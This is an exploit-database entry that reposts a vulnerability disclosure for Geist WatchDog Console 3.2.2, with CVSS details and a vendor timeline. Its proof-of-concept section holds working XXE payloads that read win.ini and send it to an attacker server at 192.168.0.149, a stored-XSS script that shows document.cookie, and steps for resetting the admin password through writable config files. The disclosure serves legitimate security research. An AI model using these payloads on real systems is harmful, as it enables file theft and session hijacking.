Exploitalert - Database of Exploits

Geist WatchDog Console 3.2.2 XSS / XML Injection / Insecure Permissions

CVE	Category	Price	Severity
CVE-2018-10077	CWE-611	$500	High

Author	Risk	Exploitation Type	Date
Unknown	High	Remote	2018-04-19

CPE
cpe:cpe:/a:geist:watchdog_console:3.2.2

CVSS	EPSS	EPSSP
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N	0.02192	0.50148

CVSS vector description

Metric	Value	Metric Description	Value Description
Attack vector	Network	AV	The vulnerable system is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). An example of a network attack is an attacker causing a denial of service by sending a specially crafted TCP packet across a wide area network (e.g., CVE-2004-0230).
Attack Complexity	Low	AC	The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system.
Privileges Required	High	PR	The attacker requires privileges that provide significant (e.g., administrative) control over the vulnerable system allowing full access to the vulnerable system’s settings and files.
User Interaction	None	UI	The vulnerable system can be exploited without interaction from any human user, other than the attacker. Examples include: a remote attacker is able to send packets to a target system a locally authenticated attacker executes code to elevate privileges
Scope	Unchanged	S	An exploited vulnerability can only affect resources managed by the same security authority. In the case of a vulnerability in a virtualized environment, an exploited vulnerability in one guest instance would not affect neighboring guest instances.
Confidentiality	High	C	There is total information disclosure, resulting in all data on the system being revealed to the attacker, or there is a possibility of the attacker gaining control over confidential data.
Integrity	High	I	There is a total compromise of system integrity. There is a complete loss of system protection, resulting in the attacker being able to modify any file on the target system.
Availability	None	A	There is no impact on the availability of the system; the attacker does not have the ability to disrupt access to or use of the system.

https://cxsecurity.com/ascii/WLB-2018040163

Geist WatchDog Console 3.2.2 XSS / XML Injection / Insecure Permissions

# Exploit Author: bzyo # CVE: CVE-2018-10077, CVE-2018-10078, CVE-2018-10079 # Twitter: @bzyo_ # Exploit Title: Geist WatchDog Console 3.2.2 - Multiple Vulnerabilities # Date: 04-17-18 # Vulnerable Software: WatchDog Console - 3.2.2 # Vendor Homepage: http://www.itwatchdogs.com/ # Version: 3.2.2 # Software Link: http://www.itwatchdogs.com/userfiles/file/firmware/Console/WatchDogConsoleInstaller_v3.2.2.exe # Tested On: Windows 7 x86 Description ----------------------------------------------------------------- WatchDog Console suffers from multiple vulnerabilities: # CVE-2018-10077 Authenticated XML External Entity (XXE) # CVE-2018-10078 Authenticated Stored Cross Site Scripting (XSS) # CVE-2018-10079 Insecure File Permissions Prerequisites ----------------------------------------------------------------- To successfully exploit these vulnerabilities, an attacker must already have access to a system running WatchDog Console using a low-privileged user account Proof of Concepts ----------------------------------------------------------------- ### CVE-2018-10079 Insecure File Permissions ### By default, WatchDog Console 3.2.2 installs all configuration data at 'C:\ProgramData\WatchDog Console' and gives 'Authenticated Users' group Modify permissions C:\>icacls "c:\ProgramData\WatchDog Console" c:\ProgramData\WatchDog Console NT AUTHORITY\Authenticated Users:(OI)(CI)(M,DC) This allows any local user of the system the ability to reset the application admin password by generating a password using the PHP md5() function and updating the config.xml file. It also provides the ability to add data to servers.xml for both CVE-2018-10078 and CVE-2018-10079 or through the application interface ### CVE-2018-10077 Authenticated XML External Entity (XXE) ### With authenticated admin access to the application or local access to the system, a user has the ability to read system files remotely through XXE On attacking machine - Create data.xml with following contents in apache root and start apache listening on 80 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE r [ <!ELEMENT r ANY > <!ENTITY % sp SYSTEM "http://192.168.0.149:8080/evil.xml"> %sp; %param1; ]> <r>&exfil;</r> - Create evil.xml with the following contents anywhere <?xml version="1.0" encoding="UTF-8"?> <!ENTITY % data SYSTEM "file:///c:/windows/win.ini"> <!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://192.168.0.149:8080/?%data;'>"> - Start python simple http server in same directory as evil.xml, listening on 8080 python -m SimpleHTTPServer 8080 On victim machine (1 of 2 ways) 1. With admin access to application console, add attacking server IP address under servers tab or 2. With local access to system - update 'C:\ProgramData\WatchDog Console\servers.xml file' with following: <?xml version="1.0" encoding="utf-8" standalone="yes"?> <servers> <server host="192.168.0.149" addrType="http" port="80" description="" selEmail="True" Username="1" Password="1" left="700" top="420" /> </servers> - restart system On attacking machine - Contents of 'win.ini' is outputted to console - evil.xml can be updated to read other sensitive files (tested reading file from admin desktop) ### CVE-2018-10078 Authenticated Stored Cross Site Scripting (XSS) ### This application suffers from authenticated XSS on several inputs (1 of 2 ways) 1. With admin access to application console, under servers tab - add dummy IP in server name filed - add <script>alert(document.cookie)</script>"> into server description or 2. With local access to system - update 'C:\ProgramData\WatchDog Console\servers.xml file' with following: <?xml version="1.0" encoding="utf-8" standalone="yes"?> <servers> <server host="172.16.1.1" addrType="http" port="80" description="<script>alert(document.cookie)</script>">" selEmail="True" Username="1" Password="1" left="400" top="180" /> </servers> - restart system 3. popup with cookie appears when browsing from Overview, Dashboard, and Server tabs. Remains after reboot. Timeline --------------------------------------------------------------------- 04-14-18: Vendor notified of vulnerabilities 04-16-18: Vendor responded "Thank you for bringing this to our attention. The product has now been End-of-life for several years and is no longer receiving updates." 04-17-18: Submitted public disclosure

Impressum